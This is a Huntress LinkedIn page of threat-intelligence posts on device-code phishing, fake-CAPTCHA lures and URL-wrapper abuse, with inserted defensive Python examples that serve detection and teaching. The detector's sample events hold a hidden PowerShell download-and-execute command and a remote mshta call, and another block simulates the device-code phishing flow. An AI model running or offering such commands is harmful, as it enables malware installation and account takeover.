Huntress

Computer and Network Security

Columbia, Maryland 136,080 followers

Managed #cybersecurity without the complexity. EDR, ITDR, SIEM & SAT crafted for under-resourced IT and Security teams.

About us

Protect Your Endpoints, Identities, Logs, and Employees. The fully managed security platform that combines endpoint detection and response, Microsoft 365 identity protection, a predictably affordable SIEM and science-based security awareness training. Powered by custom-built enterprise technology for mid-market enterprises, small businesses, and the MSPs that support them and delivered by unrivaled industry analysts in our 24/7 Security Operations Center. By delivering a suite of purpose-built solutions that meet budget, security, and peace-of-mind requirements, Huntress is how the globe’s most under-resourced businesses defend against today’s cyberthreats. As long as hackers keep hacking, we keep hunting.

Industry
Computer and Network Security
Company size
501-1,000 employees
Headquarters
Columbia, Maryland
Type
Privately Held
Founded
2015
Specialties
Cyber Breach Detection, Incident Response, Endpoint Protection, Malware Analysis, and Managed Services

Updates

  • That "enter code on your phone" prompt you never question? Big cybercrime built a business around it. You've seen the flow before:
    → You log into Netflix on your TV.
    → A code pops up on your screen.
    → You grab your phone, go to netflix.com/tv, and enter the code.
    → And you're in!
    It's legit, it's familiar, and EvilTokens knew that. Instead of sending victims to a fake login page, EvilTokens sent them to a real one. And one pasted code later, they were in, too. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down exactly how it worked and what you can do to protect yourself: https://okt.to/l15YS3
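The post above describes the OAuth 2.0 device authorization grant (RFC 8628) being used as a phishing primitive: the attacker, not the victim, requests the code pair, and the victim approves it on the genuine sign-in page. The following is an added example, not Huntress's code and not EvilTokens' tooling: an in-memory stand-in for an identity provider that implements the three steps of the grant, so you can see why the token lands in the attacker's session even though the victim completed a real login with MFA. The hostnames, client name and code formats are constructed for illustration.

```python
"""Added example (not Huntress's code): a minimal in-memory simulation of the
OAuth 2.0 device authorization grant (RFC 8628) showing why a pasted user code
hands the *requesting client* a token. All names and values are constructed."""
import secrets
import time
from dataclasses import dataclass
from typing import Optional

VERIFY_URI = "https://login.example.com/device"  # stand-in for the real IdP page


@dataclass
class DeviceGrant:
    device_code: str            # secret, known only to the client that asked for it
    user_code: str              # short code the human types on the verification page
    client_id: str
    expires_at: float
    authorized_by: Optional[str] = None  # user principal once the human approves


class AuthorizationServer:
    """Stand-in identity provider. The essential property is the real one:
    the token is issued to whoever holds device_code, not to the browser
    session that approved the user_code."""

    def __init__(self) -> None:
        self._by_device: dict[str, DeviceGrant] = {}
        self._by_user_code: dict[str, DeviceGrant] = {}

    def device_authorization(self, client_id: str) -> dict:
        # Step 1: the *client* (here, the attacker's script) asks for a code pair.
        grant = DeviceGrant(
            device_code=secrets.token_urlsafe(32),
            user_code="-".join(secrets.token_hex(2).upper() for _ in range(2)),
            client_id=client_id,
            expires_at=time.time() + 900,  # 15 minutes, a typical lifetime
        )
        self._by_device[grant.device_code] = grant
        self._by_user_code[grant.user_code] = grant
        return {"device_code": grant.device_code, "user_code": grant.user_code,
                "verification_uri": VERIFY_URI, "expires_in": 900}

    def approve(self, user_code: str, signed_in_user: str) -> bool:
        # Step 2: the *victim* types user_code on the genuine verification page
        # after a genuine sign-in, MFA included. Nothing here can tell who
        # originally requested the code; that is the protocol's design.
        grant = self._by_user_code.get(user_code)
        if grant is None or grant.expires_at < time.time():
            return False
        grant.authorized_by = signed_in_user
        return True

    def token(self, client_id: str, device_code: str) -> dict:
        # Step 3: the client polls the token endpoint; once approved it receives
        # tokens minted for the approving user.
        grant = self._by_device.get(device_code)
        if grant is None or grant.client_id != client_id:
            return {"error": "invalid_grant"}
        if grant.authorized_by is None:
            return {"error": "authorization_pending"}
        return {"access_token": f"at-for-{grant.authorized_by}", "token_type": "Bearer"}


def run_phish(victim: str = "alice@victim.example",
              attacker_client: str = "public-client-app") -> dict:
    """Play the three steps end to end and return what each party saw."""
    idp = AuthorizationServer()
    lure = idp.device_authorization(attacker_client)      # attacker obtains code pair
    lure_text = f"Go to {lure['verification_uri']} and enter {lure['user_code']}"  # emailed to victim
    pending = idp.token(attacker_client, lure["device_code"])  # attacker polls, nothing yet
    idp.approve(lure["user_code"], victim)                  # victim does exactly what the email says
    issued = idp.token(attacker_client, lure["device_code"])  # attacker now holds the victim's token
    return {"lure": lure_text, "before_approval": pending, "after_approval": issued}


if __name__ == "__main__":
    for k, v in run_phish().items():
        print(f"{k}: {v}")
```

The practical takeaway for defenders is that the approval and the token use come from two different places: the victim's browser approves at the verification page, while the attacker's client polls the token endpoint from its own infrastructure. Where your identity provider lets you restrict or block the device code flow for users who have no legitimate need for it (in Entra ID this is a Conditional Access "authentication flows" condition), that removes the primitive entirely; otherwise, sign-in logs that record the authentication protocol as device code are the place to hunt.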
  • Read Anna Pham's full write-up: https://okt.to/2VPnuU If you’ve ever used a free background remover website, you might have installed malware without even knowing it. You upload a selfie (or maybe a picture of your dog), watch the progress bar spin, and click download, which triggers a prompt to prove you're not a robot. That’s the trap. That click quietly copies a malicious command to your clipboard and instructs you to paste it into the Windows Run dialog box. If you hit enter? You're not verifying anything. You're installing it: a remote access trojan and potentially a credential stealer, too. Rule of thumb: No legit website will ever ask you to copy/paste a command into your system. If it does, close the tab.
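The user-side rule in the post (never paste a command you were handed) is the prevention; the detection side is that a command pasted into the Run dialog is launched directly by explorer.exe, so the resulting process tree looks different from a script started by a scheduler or a service. The following is an added example, not from Anna Pham's write-up or Huntress's product: a small scoring heuristic run over constructed process-creation events. The field names (ParentImage, Image, CommandLine) follow a Sysmon-like shape but are an assumption about your telemetry, and the sample events are made up.

```python
"""Added example (not from the Huntress write-up): heuristic detection for the
'paste this into the Run dialog' chain. Runs over constructed process-creation
events; the field names are an assumed Sysmon-like shape, not a real schema."""
import re
from typing import Iterable

# Interpreters and LOLBins a pasted one-liner typically lands in. Explorer
# launching one of these directly (Win+R) is unusual for most users.
RUN_TARGETS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
               "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# Markers of a remote fetch-and-execute, encoded payload, or window hiding.
SUSPICIOUS = re.compile(
    r"(https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|/c\s+start\s+/min)", re.I)

# Fake-CAPTCHA lures often leave their bait text in the command itself (a trailing
# comment such as 'I am not a robot') so the Run box looks harmless to the victim.
BAIT = re.compile(r"not a robot|verification|captcha", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Each independent signal adds one point;
    three or more points on one event is worth an alert."""
    reasons = []
    if basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("spawned directly by explorer.exe (Run dialog / double-click)")
    if basename(ev.get("Image", "")) in RUN_TARGETS:
        reasons.append(f"interpreter/LOLBin: {basename(ev['Image'])}")
    cmd = ev.get("CommandLine", "")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
    if hits:
        reasons.append("command line: " + ", ".join(hits))
    if BAIT.search(cmd):
        reasons.append("CAPTCHA bait string in command line")
    return len(reasons), reasons


def flag_events(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Return the events whose score reaches the threshold, annotated with why."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append({**ev, "score": score, "reasons": reasons})
    return out


# Constructed sample telemetry (not real data). Hosts are defanged on purpose.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iex (iwr http://cdn.example[.]net/x.txt)" '
                    r"# I am not a robot - reCAPTCHA Verification ID: 7624"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://verify.example[.]org/c.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\patch\update.ps1"},
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["score"], basename(hit["Image"]), "|", "; ".join(hit["reasons"]))
```

Two of the four constructed events clear the threshold: the hidden PowerShell fetch-and-execute with the CAPTAHA bait comment, and the bare mshta call to a remote .hta. The scheduled PowerShell script under svchost.exe and Notepad++ opened from Explorer stay below it, which is the point of scoring rather than alerting on any single signal. On a real estate, pair this with the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which keeps what the user actually typed or pasted into Win+R.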

  • Is EvilTokens selling resilience for attackers? Defense in depth is the gold standard, but they've built layered attack infrastructure to match your security stack hop for hop. One of their signatures: wrapping malicious URLs inside trusted security vendor redirects. The emails look clean, the links look legit, but the destination couldn't be shadier.
    → Cisco Secure Email: 5+ instances as first-hop wrapper
    → Trend Micro URL Protection: first hop in multiple chains
    → Mimecast URL Protection: wraps an intermediate redirect
    One observed chain was even triple-wrapped: SafeLinks → Trend Micro → Cisco Secure Web → final phishing page. The victim's email security stack sees a Cisco or Trend Micro link and waves it right on through. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down this moment in security where threats look just like your workflow. Save your spot for the live event: https://lnkd.in/gUCJ7D_9
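The defensive check implied by the post is to stop judging a link by the vendor hostname on the outside and instead peel every wrapper until you reach the URL the browser will actually land on. The following is an added example, not Huntress's code: a small unwrapper that handles the two common ways a rewrite service embeds the original link, as a query parameter (the Microsoft SafeLinks ?url= form is documented) or appended to the path after a token (the secure-web.cisco.com form is assumed here, as is the Trend Micro ?url= form used in the sample). The triple-wrapped chain it runs on is constructed, not the one observed in the campaign.

```python
"""Added example (not from the Huntress post): peel nested URL-protection
wrappers to reach the URL that is actually visited. The SafeLinks ?url= form
is documented; the secure-web.cisco.com path form and the Trend Micro ?url=
form are assumptions for this example. The sample chain is constructed."""
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

MAX_DEPTH = 10  # guard against wrapper loops or absurdly deep chains
_URL_IN_PATH = re.compile(r"https?://", re.I)


def _candidates(url: str):
    """Yield every embedded http(s) URL found in the query values or the path."""
    parts = urlsplit(url)
    # Wrappers that carry the target as a query parameter; parse_qs already
    # percent-decodes one level, which is exactly one wrapper's worth.
    for vals in parse_qs(parts.query, keep_blank_values=True).values():
        for v in vals:
            if v.lower().startswith(("http://", "https://")):
                yield v
    # Wrappers that append the target after a token: /<token>/https://...
    # The inner URL's own query string is the outer one, so re-attach it.
    path = unquote(parts.path)
    m = _URL_IN_PATH.search(path, 1)
    if m:
        inner = path[m.start():]
        yield inner + ("?" + parts.query if parts.query else "")


def unwrap(url: str) -> list[str]:
    """Return the chain of URLs from the outermost wrapper to the final destination."""
    chain = [url]
    seen = {url}
    while len(chain) <= MAX_DEPTH:
        inner = next(_candidates(chain[-1]), None)
        if inner is None or inner in seen:
            break
        chain.append(inner)
        seen.add(inner)
    return chain


def final_host(url: str) -> str:
    """The hostname your reputation check should actually be run against."""
    return urlsplit(unwrap(url)[-1]).hostname or ""


# Constructed triple-wrapped chain: SafeLinks -> Trend Micro -> Cisco -> landing page.
PHISH = "https://login-microsoft.example-phish.test/auth?state=abc"
CISCO = "https://secure-web.cisco.com/1AbCdEfTOKEN/" + PHISH
TREND = ("https://example.trendmicro-url-protect.test/wis/clicktime/v1/query?url="
         + quote(CISCO, safe=""))
SAFELINKS = ("https://nam02.safelinks.protection.outlook.com/?url="
             + quote(TREND, safe="") + "&data=05%7C01&reserved=0")

if __name__ == "__main__":
    for hop in unwrap(SAFELINKS):
        print(f"{urlsplit(hop).hostname:45s} {hop[:70]}")
    print("final host:", final_host(SAFELINKS))
```

Run the final host, not the first hop, through whatever reputation or allow-list logic your mail gateway applies; the wrapper hostnames in the constructed chain are exactly the ones a stack "waves through". The limit of this approach is wrappers that store the destination server-side and expose only an opaque identifier in the link; those have to be followed in a sandbox to learn where they land.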
  • For more examples: https://lnkd.in/g4qvfC3t Threat actors are AI’s first power users. They're building workflows around how people actually work, so attacks blend into everyday user behavior, and malicious actions are so well disguised that threat actors can get victims to do their dirty work for them. In this example, Mark O., Huntress EMEA Security Operations Analyst, shows just how little it takes. Using Anthropic's Claude as inspo, he spun up a convincing lookalike site in five minutes, including plugin options, an FAQ section, and step-by-step instructions…that quietly walk the user through installing malware. In an era where attacks don’t look like attacks at all, defenders can't expect perfect behavior. Resilience depends on building systems that catch what humans won’t.

  • What you're looking at is a real Telegram post from the cybercrime group EvilTokens. This is how the adversary actually uses AI. Look at it! AI log analysis, keyword search, AI-powered explanations. It would’ve fit right in at a booth at RSA, tbh. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down this watershed moment in security where the latest threats look just like release notes. Save your spot for the live event: https://lnkd.in/gUCJ7D_9 Thank you to Flare for sharing these images with us!
  • How do you backdoor 100 million weekly downloads? Compromise one guy's npm account. 👇 That's how the axios npm attack started in March. A threat actor posing as a company founder reached out to an axios maintainer using a fake Slack workspace, a fake Teams call, and a fake "your system is out of date" prompt. One install later, they had a RAT on his machine and the keys to the axios npm account. In just three hours, Huntress observed 135 endpoints across macOS, Windows, and Linux checking in with the attacker's C2. Google attributed the attack to UNC1069, a North Korean threat actor active since at least 2018. In this month's Tradecraft Tuesday, John Hammond and Logan MacLaren broke it all down alongside Benjamin Read, Director of Strategic Intelligence at Wiz, and Charlie Eriksen, security researcher at Aikido Security. Check out the highlights: https://okt.to/gs9mYk

  • Attackers are hacking human nature and phishing is the easiest way in. 🎣 The lures look familiar:
    → E-signature requests
    → Invoice notifications
    → Voicemail alerts
    Boring on purpose. If you can make the lure look routine, you can make the victim do the work for you. We analyzed phishing trends from emails reported by Huntress Managed SAT learners throughout 2025. This is what we found. Check out more in our 2026 Cyber Threat Report: https://lnkd.in/gTyswNGh

  • This might be one of the most influential incidents you’ve never heard of. In February 2026, a phishing operation called EvilTokens weaponized Railway to stand up token-harvesting infrastructure at machine speed. AI-generated lures tailored to your role and industry. Legit Microsoft auth flows abused by design. Infrastructure running on trusted tooling like AWS and Cloudflare. What do you do when every indicator of compromise is novel? On May 5, Casey S. from Huntress and special guest Sherrod DeGrippo from Microsoft Threat Intelligence are breaking down what happened, why it worked, and what defenders can do about it. Save your spot for the live event. 👇 #MSPartner

    EvilTokens: Big Cybercrime’s AI Platform Built to Bypass Your MFA

  • In March, the Huntress SOC came across a super strange incident: A developer was using OpenAI’s Codex AI agent to build two applications...at the same time as they were using Codex to respond to malicious behavior on their Linux system. Codex masked some symptoms, like the loud fan from a cryptominer. But it couldn’t actually remediate the threat, and the commands it generated made triage a lot noisier. Then, the user installed the Huntress agent, and our SOC got to work. This story picks up from the SOC’s perspective as they dig into the incident, navigating a complex investigation with three totally different storylines: a legit developer building web apps, multiple threat actors dropping payloads and setting up persistence, and an AI agent churning out noise in the background. Special thanks to James Northey, John Hammond, Tanner Filip, and Lindsey O'Donnell-Welch for their contributions to this write-up. Let’s dive in: https://okt.to/Quo0OZ

  • If you’re seeing this, cybercriminals might already have all they need to wreck you. We’ve all left a digital trail. 🤳 But with every job update and profile photo comes a data point attackers can use against you. In the next episode of Huntress _declassified, Truman Kain and Caitlin Sarian, aka "Cybersecurity Girl," will reveal how your online presence becomes intel and what you can do to make yourself harder to target. Register now: https://lnkd.in/gC6Myx8b
